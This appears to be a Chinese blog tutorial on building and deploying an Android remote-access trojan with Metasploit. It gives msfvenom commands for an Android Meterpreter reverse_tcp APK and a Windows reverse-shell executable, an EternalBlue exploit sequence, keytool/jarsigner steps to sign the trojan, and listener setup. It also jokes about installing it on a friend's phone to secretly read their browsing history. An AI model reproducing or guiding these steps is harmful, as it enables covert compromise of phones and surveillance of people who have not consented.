首页 > 其他分享 >红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)

红队老子养成记2 - 不想渗透pc?我们来远控安卓!(全网最详细)

时间:2024-10-08 18:19:37浏览次数:14  
标签:控安卓 apk msfconsole pc 签名 key msfvenom 红队 Payload

大家好,我是Dest1ny。

今天我们是红队专题中的远控安卓。

这个实验会非常有趣,大家多多点赞!


环境:

一台有公网ip的vps / kali / 带msf工具即可

一台安卓手机(最好老一点,因为我们这里不涉及免杀)

CLASS-1 msfconsole 和 msfvenom

msfconsole

  • 功能: msfconsole 是 Metasploit 框架的主要命令行界面,是一个功能全面且强大的控制台。它用于执行各种攻击操作,包括漏洞扫描、漏洞利用、后期渗透等。
  • 特点:
    • 允许用户浏览、选择和执行可用的漏洞利用模块(Exploit Modules)。
    • 可以设置Payload(恶意代码)、编码器(Encoders)、监听器(Listeners)等参数。
    • 支持通过插件和脚本扩展功能,如 post-exploitation 模块、漏洞扫描插件等。
    • 支持与其他工具集成,方便进行信息收集、漏洞扫描、提权和持久化等任务。
  • 使用场景:
    • 当你想要选择和执行漏洞利用时,可以通过 msfconsole 加载模块、配置参数,并执行攻击。
    • 适合实时操作和渗透测试人员互动操作。
msfconsole

进入控制台后,可以使用例如以下命令:

use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS 192.168.1.100 
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
run 

msfvenom

  • 功能: msfvenom 是 Metasploit 用于生成攻击Payload的工具,它将之前的 msfpayloadmsfencode 工具合并为一个单独的工具。主要用于生成可用于漏洞利用的有效载荷(Payload)。
  • 特点:
    • 允许用户自定义Payload,并指定生成的格式(如 exe, elf, apk, raw 等)。
    • 支持对Payload进行编码和混淆,以绕过杀毒软件或检测机制。
    • 生成后的Payload可以与其他工具(如 msfconsole)一起使用,或直接用于恶意软件开发。
  • 使用场景:
    • 当你需要生成特定的Payload(如反向shell、绑定shell、下载执行器等)时,可以使用 msfvenom 自定义Payload参数并生成对应的文件。
    • 适合用来制作免杀Payload、混淆恶意软件,或在渗透测试中注入漏洞利用代码。
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
  • 这条命令将生成一个反向TCP连接的Windows Meterpreter Payload,并保存为一个可执行文件 payload.exe

总结

  • msfconsole: 用于管理和执行漏洞利用的交互式控制台。
  • msfvenom: 用于生成和编码恶意Payload的工具。

CLASS-2 制作安卓木马

我们先使用msfvenom去制作木马!

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.209 LPORT=4444 R > Dest1ny.apk

这里的lhost使用本地的ip,lport是你想去监听的端口

CLASS-3 apk签名

为什么要apk签名?

APK需要签名的原因主要有以下几点:

  1. 验证完整性:签名确保APK未被篡改。如果APK文件被修改,签名验证将失败,系统会阻止安装。

  2. 开发者身份:签名帮助识别应用程序的开发者,确保应用来自可信来源,防止恶意软件冒充合法应用。

  3. 权限管理:通过签名,应用可以安全地共享权限和数据。如果两个应用具有相同签名,可以相互访问数据。

  4. 安全分发:在官方应用商店发布的APK必须签名,以减少恶意软件传播的风险。

  5. 防伪造:签名防止攻击者伪造应用,确保只有合法的APK能被安装和运行。

现在我们有一个apk文件,但是不是所有的apk文件都可以传到手机上就可以下载,我们要加入签名才可以。

第一步:使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

这时候你会有一个my-release-key.Keystore的文件

第二步:使用该key文件配合JARsigner为APK签名

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore Dest1ny.apk alias_name

第三步:然后使用JARsigner验证签名

jarsigner -verify -verbose -certs Dest1ny.apk

 

CLASS-4  开始远控

使用msfconsole开启Metasploit

进行监听,要提前设置payload

use 7即可mei

没有公网ip,需要攻击机和被害机都在同一局域网下

然后就是设置lhost和lport

还要设置一下payload

android/meterpreter/reverse_tcp

 

使用你的被害者手机去下载apk文件,因为没有免杀,你要去手动下载!

这时候你就可以去偷偷看朋友的浏览记录了hhhh!

这里就不演示了!


今天肯定不水了!

后面我也会持续去更新内容!

大家多多点赞!!

想到300粉丝了!

标签:控安卓,apk,msfconsole,pc,签名,key,msfvenom,红队,Payload
From: https://blog.csdn.net/m0_70065235/article/details/142761509

相关文章

  • Matrix Distances(ICPC2023 合肥站)
    #include<bits/stdc++.h>#defineendl'\n'#defineintllusingll=longlong;typedefunsignedlonglongull;usingnamespacestd;voidGordenGhost();signedmain(){#ifdefGordenfreopen("in.txt","rt",stdi......
  • 上传本地pcd文件,并用threejs渲染
    页面<template><div><inputtype="file"@change="handleFileUpload"accept=".pcd"/><inputtype="file"@change="changeFile"/><div@click="stringToFileClick&......
  • OPCUA 方法和事件的区别
     OPCUA(开放平台通信统一架构)是一种用于工业自动化的通信协议,它支持数据的获取、控制和监控。在OPCUA中,方法(Methods)和事件(Events)是两种重要的概念,它们有以下区别:方法(Methods)定义:方法是一个可以被调用的操作,通常与某个对象相关联,可以处理输入参数并返回输出结果。功能......
  • 2024CCPC山东省赛补题记录
    前言今天和队友VP了24CCPC山东省赛,最后9题,但是赛中7题左右我就隐身了,赛后看题解发现E题不难,赛时过的人太少导致有点畏手畏脚,看到题解一下就懂了,几分钟写好。这里主要补一下E和L的题解,这场比赛学到了维护区间信息,可以考虑把区间挂在线段树节点上,以及动态维护树直径的典。E传感器......